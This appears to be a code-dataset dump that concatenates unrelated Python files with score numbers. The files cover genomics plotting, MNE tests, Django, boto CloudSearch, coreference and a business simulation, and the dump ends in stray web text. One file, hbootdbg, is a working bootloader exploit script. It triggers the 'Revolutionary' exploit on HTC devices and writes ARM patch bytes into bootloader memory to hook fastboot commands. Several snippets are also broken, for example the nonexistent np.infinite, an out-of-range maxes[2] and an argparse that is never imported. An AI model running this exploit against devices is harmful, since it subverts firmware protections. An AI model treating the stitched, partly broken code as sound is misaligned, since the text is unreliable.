high_frequency = df[df["ALLELE FREQUENCY"]>0.05]
x = list(high_frequency["AA_POS"])
y = list(high_frequency["ALLELE FREQUENCY"])
mutation = list(high_frequency["MUTATION"])
x_dup = [x[0]]
y_dup = [y[0]]
mutation_dup = [mutation[0]]
for aa in range(1, len(x)):
if x[aa] == x[aa-1]:
mutation_dup[-1] = mutation_dup[-1] + ', ' + mutation[aa]
else:
x_dup.append(x[aa])
y_dup.append(y[aa])
mutation_dup.append(mutation[aa])
fig = plt.figure()
ax = fig.add_subplot(111)
x = list(df.AA_POS)
y = list(df["ALLELE FREQUENCY"])
plt.plot(x, y)
plt.axhline(y=0.05, color='r')
for i in range(len(x_dup)):
ax.annotate(mutation_dup[i], xy=[x_dup[i],y_dup[i]], textcoords='data', rotation=70)
plt.grid()
plt.savefig('variant_plot.tiff')
#plt.show()
| 0.005803 |
#! /usr/bin/env python3
# This file is part of hbootdbg.
# Copyright (c) 2013, Cedric Halbronn <[email protected]>
# Copyright (c) 2013, Nicolas Hureau <[email protected]>
# All right reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# * Neither the name of the {organization} nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import binascii
import os
import struct
import sys
import time
from hboot import HbootClient
PRELOADER_PATH = '../src'
DEBUGGER_PATH = '../src'
TTY='/dev/ttyUSB0'
##
# Preloader commands
##
READ_MEM = 7
WRITE_MEM = 8
##
# Supported firmware revisions.
##
# cmd_hook: address of function to hook
# preload_addr: where the preloader is uploaded (device specific)
DEVICE_OFFSETS = {
'vision_0.85.0005' : {
'fb_oem_hook' : 0x0, # FIXME
'hb_keytest_hook' : 0x0, # FIXME
'preloader' : 0x0, # FIXME
'payload' : 0x0, # FIXME
},
'vision_0.85.0015' : {
'fb_oem_hook' : 0x8D0020C8,
'hb_keytest_hook' : 0x8D010DF0,
'preloader' : 0x058D3000,
'payload' : 0x8D0E2000, # Where the debugger is uploaded
},
'saga_0.98.0002' : {
'fb_oem_hook' : 0x8D00236C,
'hb_keytest_hook' : 0x0, # FIXME
'preloader' : 0x069D3000,
'payload' : 0x0, # FIXME
},
}
def dbg_read_memory(fbc, addr, size):
cmd = struct.pack('=BII', READ_MEM, addr, size)
data = fbc.preloader(cmd)
return data
def dbg_write_memory(fbc, dest, data):
(res1, res2) = fbc.download_data(data)
cmd = struct.pack('=BII', WRITE_MEM, dest, len(data))
data = fbc.preloader(cmd)
return data
def step(msg, step_function, *args, out=sys.stderr, continue_on_fail=False):
out.write('[*] %s' % msg)
out.flush()
(success, error_msg) = step_function(*args);
if success:
out.write('\r[+] %s: %s\n' % (msg, error_msg))
else:
out.write('\r[!] %s: %s\n' % (msg, error_msg))
out.flush()
if not success and not continue_on_fail:
sys.exit(1)
##
# Get HBOOT version
##
def get_hboot_version(fbc):
global offsets
(res1, version0) = fbc.getvar('version-bootloader')
(res2, product) = fbc.getvar('product')
version='%s_%s' % (product.decode(), version0.decode())
if res1 != b'OKAY' or res2 != b'OKAY':
return (False, 'Unknown device revision %s, aborting' % version)
offsets = DEVICE_OFFSETS[version]
return (True, version)
##
# Copy preloader stub
##
def copy_preloader(fbc):
(res1,res2) = fbc.download('%s/preloader.bin' % PRELOADER_PATH)
return (True, 'OK')
##
# Trigger revolutionary exploit
##
def trigger_exploit(fbc):
(res, version_main) = fbc.getvar('version-main')
return (True, 'OK')
##
# Check if exploit successful
##
def check_exploit_result(fbc):
(res, version0) = fbc.getvar('version-bootloader')
return (version0 == b'HACK', version0.decode())
##
# We can now use the preloader function to inject the real payload faster.
##
def copy_hbootdbg(fbc):
data = b''
with open('%s/hbootdbg.bin' % DEBUGGER_PATH, 'br') as f:
data = dbg_write_memory(fbc, offsets['payload'], f.read())
return (True, 'OK')
##
# Patch fastboot oem and hboot keytest to point at final payload
##
# patch:
# 10 40 2D E9 STMFD SP!, {R4,LR}
# 0F E0 A0 E1 MOV LR, PC
# 00 F0 1F E5 LDR PC, =0x8D0E2000
# 10 80 BD E8 LDMFD SP!, {R4,PC}
# 00 00 0E 8D DCD 0x8D0E2000
def patch_cmds(fbc):
global offsets
patch = b'\x10\x40\x2D\xE9'
patch += b'\x0F\xE0\xA0\xE1'
patch += b'\x00\xF0\x1F\xE5'
patch += b'\x10\x80\xBD\xE8'
patch += struct.pack('I', offsets['payload'])
data = dbg_write_memory(fbc, offsets['hb_keytest_hook'], patch)
data = dbg_write_memory(fbc, offsets['fb_oem_hook'], patch)
return (True, 'OK')
if __name__ == '__main__':
fbc = None
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--debug', action='store_true')
args = parser.parse_args()
def connect_to_device(args):
global fbc
not_connected = True
while not_connected:
try:
fbc = HbootClient(debug=args.debug)
not_connected = False
except Exception as e:
time.sleep(1)
return (True, 'OK')
step('Wait for device', connect_to_device, args)
step('Get HBOOT version', get_hboot_version, fbc)
step('Copy preloader', copy_preloader, fbc)
step('Trigger Revolutionary exploit', trigger_exploit, fbc)
step('Get HBOOT version', check_exploit_result, fbc)
step('Copy hbootdbg', copy_hbootdbg, fbc)
step('Patch fastboot oem and hboot keytest commands', patch_cmds, fbc)
fbc.close()
| 0.008701 |
# Authors: Robert Luke <[email protected]>
# Eric Larson <[email protected]>
# Alexandre Gramfort <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
import pytest
import numpy as np
from mne.datasets.testing import data_path
from mne.io import read_raw_nirx, BaseRaw, read_raw_fif
from mne.preprocessing.nirs import optical_density, beer_lambert_law
from mne.utils import _validate_type
from mne.datasets import testing
from mne.externals.pymatreader import read_mat
fname_nirx_15_0 = op.join(data_path(download=False),
'NIRx', 'nirscout', 'nirx_15_0_recording')
fname_nirx_15_2 = op.join(data_path(download=False),
'NIRx', 'nirscout', 'nirx_15_2_recording')
fname_nirx_15_2_short = op.join(data_path(download=False),
'NIRx', 'nirscout',
'nirx_15_2_recording_w_short')
@testing.requires_testing_data
@pytest.mark.parametrize('fname', ([fname_nirx_15_2_short, fname_nirx_15_2,
fname_nirx_15_0]))
@pytest.mark.parametrize('fmt', ('nirx', 'fif'))
def test_beer_lambert(fname, fmt, tmpdir):
"""Test converting NIRX files."""
assert fmt in ('nirx', 'fif')
raw = read_raw_nirx(fname)
if fmt == 'fif':
raw.save(tmpdir.join('test_raw.fif'))
raw = read_raw_fif(tmpdir.join('test_raw.fif'))
assert 'fnirs_cw_amplitude' in raw
assert 'fnirs_od' not in raw
raw = optical_density(raw)
_validate_type(raw, BaseRaw, 'raw')
assert 'fnirs_cw_amplitude' not in raw
assert 'fnirs_od' in raw
assert 'hbo' not in raw
raw = beer_lambert_law(raw)
_validate_type(raw, BaseRaw, 'raw')
assert 'fnirs_cw_amplitude' not in raw
assert 'fnirs_od' not in raw
assert 'hbo' in raw
assert 'hbr' in raw
@testing.requires_testing_data
def test_beer_lambert_unordered_errors():
"""NIRS data requires specific ordering and naming of channels."""
raw = read_raw_nirx(fname_nirx_15_0)
raw_od = optical_density(raw)
raw_od.pick([0, 1, 2])
with pytest.raises(ValueError, match='ordered'):
beer_lambert_law(raw_od)
# Test that an error is thrown if channel naming frequency doesn't match
# what is stored in loc[9], which should hold the light frequency too.
raw_od = optical_density(raw)
raw_od.rename_channels({'S2_D2 760': 'S2_D2 770'})
with pytest.raises(ValueError, match='frequency do not match'):
beer_lambert_law(raw_od)
# Test that an error is thrown if inconsistent frequencies used in data
raw_od.info['chs'][2]['loc'][9] = 770.0
with pytest.raises(ValueError, match='pairs with frequencies'):
beer_lambert_law(raw_od)
@testing.requires_testing_data
def test_beer_lambert_v_matlab():
"""Compare MNE results to MATLAB toolbox."""
raw = read_raw_nirx(fname_nirx_15_0)
raw = optical_density(raw)
raw = beer_lambert_law(raw, ppf=0.121)
raw._data *= 1e6 # Scale to uM for comparison to MATLAB
matlab_fname = op.join(data_path(download=False),
'NIRx', 'nirscout', 'validation',
'nirx_15_0_recording_bl.mat')
matlab_data = read_mat(matlab_fname)
for idx in range(raw.get_data().shape[0]):
mean_error = np.mean(matlab_data['data'][:, idx] -
raw._data[idx])
assert mean_error < 0.1
matlab_name = ("S" + str(int(matlab_data['sources'][idx])) +
"_D" + str(int(matlab_data['detectors'][idx])) +
" " + matlab_data['type'][idx])
assert raw.info['ch_names'][idx] == matlab_name
| 0 |
import json
from django.test.client import RequestFactory
from django.core.urlresolvers import resolve, Resolver404
__version__ = '0.1.1'
# Version synonym
VERSION = __version__
class WebSocketRequest(object):
def __init__(self, message, factory_defaults=None):
self.message = message
self.factory_defaults = factory_defaults
self.error = None
self.validate()
def get_url(self):
return self.json_message.get('url')
def get_method(self):
return self.json_message.get('method', 'GET').lower()
def get_data(self):
return self.json_message.get('data', {})
def get_token(self):
return self.json_message.get('token')
def set_error(self, error_message, status_code=400):
self.error = {
'error': error_message,
'status_code': status_code
}
def validate(self):
if self.is_valid_message():
self.url = self.get_url()
self.method = self.get_method()
self.data = self.get_data()
self.token = self.get_token()
if self.url:
self.get_url_resolver_match()
else:
self.set_error('Missing URL')
def is_valid(self):
return not self.error
def is_valid_message(self):
try:
self.json_message = json.loads(self.message)
except ValueError:
self.set_error('Invalid formatted message.')
return False
return True
def get_url_resolver_match(self):
try:
return resolve(self.url)
except Resolver404:
self.set_error('Resource not found.', 404)
def get_factory(self):
defaults = {}
if self.token:
defaults['HTTP_AUTHORIZATION'] = "JWT {0}".format(self.token)
if self.factory_defaults:
defaults.update(self.factory_defaults)
return RequestFactory(**defaults)
def get_request(self, factory):
if self.method != 'get':
self.data = json.dumps(self.data)
return getattr(factory, self.method)(
self.url,
self.data,
content_type='application/json'
)
def get_view(self, resolver_match, request):
args = resolver_match.args
kwargs = resolver_match.kwargs
return resolver_match.func(request, *args, **kwargs)
def get_response(self):
if self.is_valid():
factory = self.get_factory()
request = self.get_request(factory)
resolver_match = self.get_url_resolver_match()
view = self.get_view(resolver_match, request)
return view
return self.error
| 0 |
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates.
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto.exception
from boto.compat import json
import requests
import boto
class SearchServiceException(Exception):
pass
class CommitMismatchError(Exception):
pass
class EncodingError(Exception):
"""
Content sent for Cloud Search indexing was incorrectly encoded.
This usually happens when a document is marked as unicode but non-unicode
characters are present.
"""
pass
class ContentTooLongError(Exception):
"""
Content sent for Cloud Search indexing was too long
This will usually happen when documents queued for indexing add up to more
than the limit allowed per upload batch (5MB)
"""
pass
class DocumentServiceConnection(object):
"""
A CloudSearch document service.
The DocumentServiceConection is used to add, remove and update documents in
CloudSearch. Commands are uploaded to CloudSearch in SDF (Search Document Format).
To generate an appropriate SDF, use :func:`add` to add or update documents,
as well as :func:`delete` to remove documents.
Once the set of documents is ready to be index, use :func:`commit` to send the
commands to CloudSearch.
If there are a lot of documents to index, it may be preferable to split the
generation of SDF data and the actual uploading into CloudSearch. Retrieve
the current SDF with :func:`get_sdf`. If this file is the uploaded into S3,
it can be retrieved back afterwards for upload into CloudSearch using
:func:`add_sdf_from_s3`.
The SDF is not cleared after a :func:`commit`. If you wish to continue
using the DocumentServiceConnection for another batch upload of commands,
you will need to :func:`clear_sdf` first to stop the previous batch of
commands from being uploaded again.
"""
def __init__(self, domain=None, endpoint=None):
self.domain = domain
self.endpoint = endpoint
if not self.endpoint:
self.endpoint = domain.doc_service_endpoint
self.documents_batch = []
self._sdf = None
def add(self, _id, version, fields, lang='en'):
"""
Add a document to be processed by the DocumentService
The document will not actually be added until :func:`commit` is called
:type _id: string
:param _id: A unique ID used to refer to this document.
:type version: int
:param version: Version of the document being indexed. If a file is
being reindexed, the version should be higher than the existing one
in CloudSearch.
:type fields: dict
:param fields: A dictionary of key-value pairs to be uploaded .
:type lang: string
:param lang: The language code the data is in. Only 'en' is currently
supported
"""
d = {'type': 'add', 'id': _id, 'version': version, 'lang': lang,
'fields': fields}
self.documents_batch.append(d)
def delete(self, _id, version):
"""
Schedule a document to be removed from the CloudSearch service
The document will not actually be scheduled for removal until :func:`commit` is called
:type _id: string
:param _id: The unique ID of this document.
:type version: int
:param version: Version of the document to remove. The delete will only
occur if this version number is higher than the version currently
in the index.
"""
d = {'type': 'delete', 'id': _id, 'version': version}
self.documents_batch.append(d)
def get_sdf(self):
"""
Generate the working set of documents in Search Data Format (SDF)
:rtype: string
:returns: JSON-formatted string of the documents in SDF
"""
return self._sdf if self._sdf else json.dumps(self.documents_batch)
def clear_sdf(self):
"""
Clear the working documents from this DocumentServiceConnection
This should be used after :func:`commit` if the connection will be reused
for another set of documents.
"""
self._sdf = None
self.documents_batch = []
def add_sdf_from_s3(self, key_obj):
"""
Load an SDF from S3
Using this method will result in documents added through
:func:`add` and :func:`delete` being ignored.
:type key_obj: :class:`boto.s3.key.Key`
:param key_obj: An S3 key which contains an SDF
"""
#@todo:: (lucas) would be nice if this could just take an s3://uri..."
self._sdf = key_obj.get_contents_as_string()
def commit(self):
"""
Actually send an SDF to CloudSearch for processing
If an SDF file has been explicitly loaded it will be used. Otherwise,
documents added through :func:`add` and :func:`delete` will be used.
:rtype: :class:`CommitResponse`
:returns: A summary of documents added and deleted
"""
sdf = self.get_sdf()
if ': null' in sdf:
boto.log.error('null value in sdf detected. This will probably raise '
'500 error.')
index = sdf.index(': null')
boto.log.error(sdf[index - 100:index + 100])
url = "http://%s/2011-02-01/documents/batch" % (self.endpoint)
# Keep-alive is automatic in a post-1.0 requests world.
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(
pool_connections=20,
pool_maxsize=50,
max_retries=5
)
session.mount('http://', adapter)
session.mount('https://', adapter)
r = session.post(url, data=sdf, headers={'Content-Type': 'application/json'})
return CommitResponse(r, self, sdf)
class CommitResponse(object):
"""Wrapper for response to Cloudsearch document batch commit.
:type response: :class:`requests.models.Response`
:param response: Response from Cloudsearch /documents/batch API
:type doc_service: :class:`boto.cloudsearch.document.DocumentServiceConnection`
:param doc_service: Object containing the documents posted and methods to
retry
:raises: :class:`boto.exception.BotoServerError`
:raises: :class:`boto.cloudsearch.document.SearchServiceException`
:raises: :class:`boto.cloudsearch.document.EncodingError`
:raises: :class:`boto.cloudsearch.document.ContentTooLongError`
"""
def __init__(self, response, doc_service, sdf):
self.response = response
self.doc_service = doc_service
self.sdf = sdf
try:
self.content = json.loads(response.content)
except:
boto.log.error('Error indexing documents.\nResponse Content:\n{0}\n\n'
'SDF:\n{1}'.format(response.content, self.sdf))
raise boto.exception.BotoServerError(self.response.status_code, '',
body=response.content)
self.status = self.content['status']
if self.status == 'error':
self.errors = [e.get('message') for e in self.content.get('errors',
[])]
for e in self.errors:
if "Illegal Unicode character" in e:
raise EncodingError("Illegal Unicode character in document")
elif e == "The Content-Length is too long":
raise ContentTooLongError("Content was too long")
else:
self.errors = []
self.adds = self.content['adds']
self.deletes = self.content['deletes']
self._check_num_ops('add', self.adds)
self._check_num_ops('delete', self.deletes)
def _check_num_ops(self, type_, response_num):
"""Raise exception if number of ops in response doesn't match commit
:type type_: str
:param type_: Type of commit operation: 'add' or 'delete'
:type response_num: int
:param response_num: Number of adds or deletes in the response.
:raises: :class:`boto.cloudsearch.document.CommitMismatchError`
"""
commit_num = len([d for d in self.doc_service.documents_batch
if d['type'] == type_])
if response_num != commit_num:
raise CommitMismatchError(
'Incorrect number of {0}s returned. Commit: {1} Response: {2}'\
.format(type_, commit_num, response_num))
| 0.002303 |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from django.core.urlresolvers import reverse
from libs.sql import get_user_tree_count, get_user_surveyed_species
from apps.users.forms import PrivacySettingsForm
from apps.users.models import achievements, update_achievements
_FOLLOWED_GROUP_CHUNK_SIZE = 2
_RESERVATION_CHUNK_SIZE = 2
def user_profile_context(user, its_me=True, home_page=True):
block_count = user.blocks_mapped_count
tree_count = get_user_tree_count(user)
species_surveyed = get_user_surveyed_species(user)
# Distinct count, not total
species_count = len(species_surveyed)
event_count = user.eventregistration_set \
.filter(did_attend=True) \
.count()
# In order to show the tree count in a "ticker" we need to break it up
# into digits and pad it with zeroes.
tree_digits = [digit for digit in "{:07d}".format(tree_count)]
privacy_form = PrivacySettingsForm(instance=user)
contributions_title = 'Your Contributions' if its_me else 'Contributions'
earned_achievements = get_achievements_for_user(user)['achieved']
context = {
'user': user,
'viewing_own_profile': its_me,
'show_username': can_show_full_name(user, its_me),
'show_achievements': its_me or (len(earned_achievements) > 0 and
user.achievements_are_public),
'show_contributions': (not home_page and
(its_me or user.contributions_are_public)),
'contributions_title': contributions_title,
'show_groups': its_me or user.group_follows_are_public,
'show_individual_mapper': (user.individual_mapper and
(its_me or user.profile_is_public)),
'show_reservations': (user.individual_mapper and its_me),
'show_request_access': (its_me and
user.eligible_to_become_individual_mapper()),
'follows': _get_follows_context(user),
'reservations': _get_reservations_context(user),
'privacy_categories': get_privacy_categories(privacy_form),
'counts': {
'block': block_count,
'tree': tree_count,
'tree_digits': tree_digits,
'species': species_count,
'species_by_name': species_surveyed,
'event': event_count
},
'achievements': earned_achievements
}
return context
def can_show_full_name(user, its_me=False):
return ((its_me or user.real_name_is_public) and
(user.first_name or user.last_name))
def get_privacy_categories(form):
user = form.instance
def make_category(title, field_name):
return {
'title': title,
'field_name': field_name,
'is_public': getattr(user, field_name),
'form_field': form[field_name]
}
return [
make_category('Profile', 'profile_is_public'),
make_category('Name', 'real_name_is_public'),
make_category('Groups', 'group_follows_are_public'),
make_category('Contributions', 'contributions_are_public'),
make_category('Rewards', 'achievements_are_public'),
]
def get_achievements_for_user(user):
if user.is_authenticated():
update_achievements(user)
user_achievements = set(user.achievement_set
.order_by('created_at')
.values_list('achievement_id', flat=True))
else:
user_achievements = set()
return {
'achieved': [(key, achievements[key])
for key in achievements.iterkeys()
if key in user_achievements],
'remaining': [
(key, achievements[key])
for key in achievements.iterkeys()
if key not in user_achievements and achievements[key].active],
'all': achievements
}
def _get_list_section_context(key, qs, chunk_size):
count = qs.count()
hidden_count = count - chunk_size
return {
'count': count,
'chunk_size': chunk_size,
'hidden_count': hidden_count,
key: qs
}
def _get_follows_context(user):
follows = user.follow_set.select_related('group').order_by('created_at')
return _get_list_section_context('follows', follows,
_FOLLOWED_GROUP_CHUNK_SIZE)
def _get_reservations_context(user):
reservations = user.blockfacereservation_set\
.current()\
.select_related('blockface')\
.order_by('expires_at')
context = _get_list_section_context('reservations', reservations,
_RESERVATION_CHUNK_SIZE)
context['map_poll_url'] = reverse('reservations_map_pdf_poll')
return context
| 0 |
__author__ = 'bernhard'
import os
import shutil
import subprocess
from qa_jbt.utils.paths import create_paths
from jbt_berkeley_coref_resolution.CorefOutputParser import CorefOutputParser
def do_coreference(article_content, data_path=os.path.join('.', 'data'), max_memory=6):
temp_path = os.path.join(os.path.normpath(data_path), 'coref_temp')
jar_home = os.path.normpath(os.path.join(data_path, '..', '..', 'jbt_berkeley_coref_resolution'))
paths = {
'input': os.path.join(temp_path, 'input'),
'preprocess': os.path.join(temp_path, 'output_preprocessing'),
'output': os.path.join(temp_path, 'output_coref'),
'exec_p': os.path.join(temp_path, 'exec_p'),
'exec_c': os.path.join(temp_path, 'exec_c')
}
create_paths(data_path, temp_path, [paths['input'], paths['preprocess'], paths['output']])
# write to file
with open(os.path.join(paths['input'], 'article'), mode='w', encoding='utf-8') as o:
o.writelines(article_content)
# call preprocessor
try:
output = subprocess.check_output(
"java -cp berkeleycoref-1.1.jar "
"-Xmx{}g "
"edu.berkeley.nlp.coref.preprocess.PreprocessingDriver "
"++base.conf "
"-execDir {} "
"-inputDir {} "
"-outputDir {} "
"-skipSentenceSplitting true "
"-respectInputLineBreaks true".format(
max_memory, # max Heap size in GB
paths['exec_p'],
paths['input'],
paths['preprocess']
),
cwd=jar_home,
shell=True
)
print(output)
except subprocess.CalledProcessError as e:
print(e)
return None
# rename file for later use
os.rename(
os.path.join(paths['preprocess'], 'article'),
os.path.join(paths['preprocess'], 'article.auto_conll')
)
# extracting coreferences
try:
output = subprocess.check_output(
"java -jar -Xmx{}g berkeleycoref-1.1.jar "
"++base.conf "
"-execDir {} "
"-modelPath {} "
"-testPath {} "
"-outputPath {} "
"-mode PREDICT".format(
max_memory, # max memory for process
paths['exec_c'], # execDir for coreference
os.path.join('models', 'coref-rawtext-final.ser'), # model path
paths['preprocess'], # input path
os.path.join(paths['preprocess'], 'berkeley_output_temp') # output file
),
cwd=jar_home,
shell=True
)
print(output)
except subprocess.CalledProcessError as e:
print(e)
return None
# preparing output
with open(os.path.join(paths['preprocess'], 'berkeley_output_temp'), mode='r', encoding='utf-8') as input_file:
lines = input_file.readlines()
with open(os.path.join(paths['output'], 'article-coref-raw'), mode='w', encoding='utf-8') as output_file:
output_file.writelines(lines[1:-1])
# get parsed output file
lines = CorefOutputParser(os.path.join(paths['output'], 'article-coref-raw')).get_resolved_text()
# remove temp path after running
shutil.rmtree(temp_path)
return lines
| 0.002714 |
#!/usr/local/bin/python3
# -*- coding:utf-8 -*-
import __future__
import os
import sys
from importlib import *
from shutil import rmtree
import script.rio as io
def build_case(case_path, output_dir, force_build = False):
'''
Build all physical/numerical data from case
'''
# If the directory does not exist, then build:
if not os.path.isdir(output_dir):
force_build = True
io.make_sure_path_exists(output_dir)
if not force_build:
last_modif = os.path.getmtime(os.path.join(case_path, 'chars.py'))
case_build_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'initial_condition')
for f in os.listdir(case_build_dir):
if f.endswith(".py"):
last_modif = max(last_modif, os.path.getmtime(os.path.join(case_build_dir, f)))
if last_modif < os.path.getctime(output_dir):
print('case already built')
sys.path.append(case_path)
import chars
qtyList = chars.quantityList
del sys.path[-1]
del sys.modules["chars"]
del chars
return list(qtyList)
print("Case path:", case_path)
sys.path.append(case_path)
# Reload chars also else, you build the case with the wrong characteristics
import chars as case
reload(case)
coords_to_uid = io.gen_coords_to_uid(case.Nx, case.Ny)
coords_to_bc = dict()
quantityDict = dict()
case.buildme(quantityDict, coords_to_uid, coords_to_bc)
# Merging uid and bc dictionaries
coords_to_uid_bc = io.gen_coords_to_uid_bc(case.Nx, case.Ny, case.BClayer)
ds = [coords_to_uid_bc, coords_to_bc]
coords_to_uid_and_bc = dict()
for coord in coords_to_bc:
coords_to_uid_and_bc[coord] = tuple(d.get(coord) for d in ds)
rmtree(output_dir, ignore_errors=True)
io.make_sure_path_exists(output_dir)
# Write scheme info
io.write_scheme_info(output_dir, case.T, case.CFL, case.gamma)
# Write domain
io.write_domain(output_dir, case.lx, case.ly, case.Nx, case.Ny, coords_to_uid, case.BClayer)
# Write boundary conditions
io.write_bc(output_dir, coords_to_uid_and_bc)
# Write quantities and boundary conditions if necessary
for q_name, q in quantityDict.items():
io.write_quantity(output_dir, q_name, q)
# Use quantity list from the characteristics.
q_name_list = list(case.quantityList)
# Del case and chars
del sys.path[-1]
del sys.modules["chars"]
del case
# Return path to case directory
return q_name_list
if __name__ == "__main__":
# Argument parser
parser = argparse.ArgumentParser(description="Build case tool")
parser.add_argument("-d", type = str, help = "Root directory")
parser.add_argument("-p", type = str, help = "Project name")
parser.add_argument("-c", type = str, help = "Case name")
args = parser.parse_args()
build_case(args.d, args.p, args.c)
| 0.007092 |
import numpy as np
from enum import Enum
import heapq
class CustomerTypes(Enum):
Innovator = 99
Early_Adopter = 96.5
Early_Majority = 83
Late_Majority = 49
Laggard = 15
class Product(object):
def __init__(self):
self.version = 0
self.price = np.infinite
self.innovation_points = 0.
self.quality = 0.
def change_params(self, params, bump_version=True):
if bump_version:
self.version += 1
self.price = params.get('price', np.infinite)
self.innovation_points = params.get('innovation', 0.)
self.quality = params.get('quality', 0.)
class Company(object):
def __init__(self, name, market__share):
self.name = name
self.market_share = market__share
self.product = None
self.type = None
self.competitive_advantage = 0.
self.industry_attractiveness = 0.
self.environmental_stability = 0.
self.financial_strength = 0.
self.history = []
self.customer_loyalty = 3
self.space_params = {
'competitive_advantage': {
'market_share': 3,
'product_quality': 3,
'product_life_cycle': 3, # late to early
'product_replacement_cycle': 3, # variable to fixed
'customer_loyalty': self.customer_loyalty,
'know_how': 3,
'vertical_integration': 3,
},
'industry_attractiveness': {
'growth_potential': 3,
'profit_potential': 3,
'financial_stability': 3,
'know_how': 3,
'resource_utilization': 3,
'capital_intensity': 3,
'ease_of_entry': 3,
'capacity_utilization': 3,
},
'environmental_stability': {
'technological_changes': 3,
'rate_of_inflation': 3,
'demand_variability': 3,
'barriers_to_entry': 3,
'competitive_pressure': 3,
'price_elasticity_of_demand': 3,
'pressure_from_substitutes': 3
},
'financial_strength': {
'ROI': 3,
'leverage': 3,
'liquidity': 3,
'required_to_available_capital': 3,
'cash_flow': 3,
'ease_of_exit': 3,
'risk_doing_business': 3, # much to little
'inventory_turnover': 3,
}
}
def set_space_params(self, args=None):
# if args exist then add copy them to space params
if args:
for k in args:
if self.space_params.get(k, None):
for k2 in args[k]:
if self.space_params[k].get(k2, None):
self.space_params[k][k2] = args[k][k2]
# calculate the SPACE parameters
for key in self.space_params:
category_sum = 0
for i, category in enumerate(self.space_params[key]):
category_sum += self.space_params[key][category]
setattr(self, key, float(category_sum) / float(i + 1))
def set_space_values(self, ca, ia, es, fs):
self.competitive_advantage = ca
self.industry_attractiveness = ia
self.environmental_stability = es
self.financial_strength = fs
self._define_quadrant()
def _define_quadrant(self):
# TODO do this
attrs = [self.competitive_advantage,
self.industry_attractiveness,
self.environmental_stability,
self.financial_strength]
maxes = heapq.nlargest(2, attrs)
ind1 = attrs.index(maxes[0])
ind2 = attrs.index(maxes[2])
def make_product(self, params):
self.product = Product()
self.product.change_params(params)
def make_move(self):
pass
class Customer(object):
def __init__(self):
self.type = None
self.sensitivity = {
'price': None,
'quality': None,
'features': None
}
self.product = None
self._define_type()
def decide_to_buy(self, companies):
# TODO make parameters to buy
scores = []
for company in companies:
temp_product = company.product
score = 0. # decided by loyalty, price , quality etc
scores.append(score)
product = companies[scores.index(max(scores))].product
def _define_type(self):
"""
Use diffusion of innovations model to decide the customer type
"""
sigma = 1
mean = 0
r = np.random.normal(mean, sigma)
if mean <= r < sigma:
self.type = CustomerTypes.Late_Majority
if r >= sigma:
self.type = CustomerTypes.Laggard
if -sigma <= r < mean:
self.type = CustomerTypes.Early_Majority
if -2 * sigma <= r < -sigma:
self.type = CustomerTypes.Early_Adopter
if r <= - 2 * sigma:
self.type = CustomerTypes.Innovator
class Market(object):
def __init__(self, args):
self.growth_rate = args.get('growth_rate', 0.)
self.value = args.get('market_value', 0.)
self.customers = []
def add_customers(self, n_customers=100000):
"""
Adds customers to the market
:param n_customers: How many to add to the market
"""
for i in xrange(n_customers):
cust = Customer()
self.customers.append(cust)
def grow(self):
"""
Grows the market by adding more customers.
"""
self.add_customers(int(len(self.customers) * self.growth_rate))
# class Strategy(object):
#
# def __init__(self, product, params):
# pass
class TheGame(object):
def __init__(self, market, companies):
self.market = market
self.companies = companies[1:]
self.ours = companies[0]
def play(self):
pass
| 0.000491 |
Subsets and Splits